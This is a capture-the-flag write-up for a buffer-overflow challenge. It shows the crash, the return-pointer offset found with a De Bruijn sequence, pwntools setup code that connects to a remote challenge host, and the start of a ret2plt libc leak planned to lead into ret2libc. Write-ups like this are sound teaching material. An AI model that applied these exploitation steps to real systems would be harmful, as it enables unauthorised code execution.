As soon as we get the file, we see we can cause a segmentation fault:
$ ./chall
It's been fun, but here we are at the final challenge!
May I know your name?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
It's been nice meeting you, aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
Segmentation fault
Using a De Bruijn Sequence, we calculate the offset until the saved return pointer to be 40.
As there is no PIE, our approach will be a standard ret2plt followed by a ret2libc.
Exploitation
First for the basic setup:
from pwn import*elf = context.binary =ELF('./chall')if args.REMOTE: p =remote('13.233.104.112', 2222) libc =ELF('./libc-remote.so')else: p =process() libc = elf.libc
Now we can start the initial ret2plt. Interestingly, the elf.plt dotdict does not work for some reason (some kind of parsing bug, I assume) so I had to hardcode in the PLT entries (which is fine, since there's no PIE):
Pretty simple - 40 characters up until the saved return pointer, a call to puts@plt and we set puts@got as the parameter to this as a way of leaking libc. Finally we set the return address to the location of main - allowing us to have another run with the ret2libc.